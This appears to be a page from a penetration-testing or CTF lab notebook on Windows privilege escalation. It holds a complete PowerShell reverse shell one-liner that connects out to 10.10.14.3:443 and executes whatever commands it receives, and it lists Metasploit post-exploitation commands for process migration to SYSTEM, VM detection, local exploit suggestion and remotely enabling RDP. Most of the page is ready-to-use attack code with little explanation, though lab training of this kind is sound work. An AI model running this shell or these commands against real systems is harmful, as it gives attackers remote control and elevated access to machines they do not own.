Windows Priv Escalate

FuzzySecurity's Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html

Powershell Reverse Shell

Create and run shell.ps1 on host

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Metasploit

Get system information

getuid
sysinfo
pwd
ps #try to use migrate to spool to get NT Authority

Figure out about current user

getprivs #Get privileges of current user

Check if you are on a VM

run post/windows/gather/checkvm

Run exploit suggester

run post/multi/recon/local_exploit_suggester

Remotely enable RDP

run post/windows/manage/enable_rdp

PreviousPowerShell for BeginnersNextIcecast (RPC)

Last updated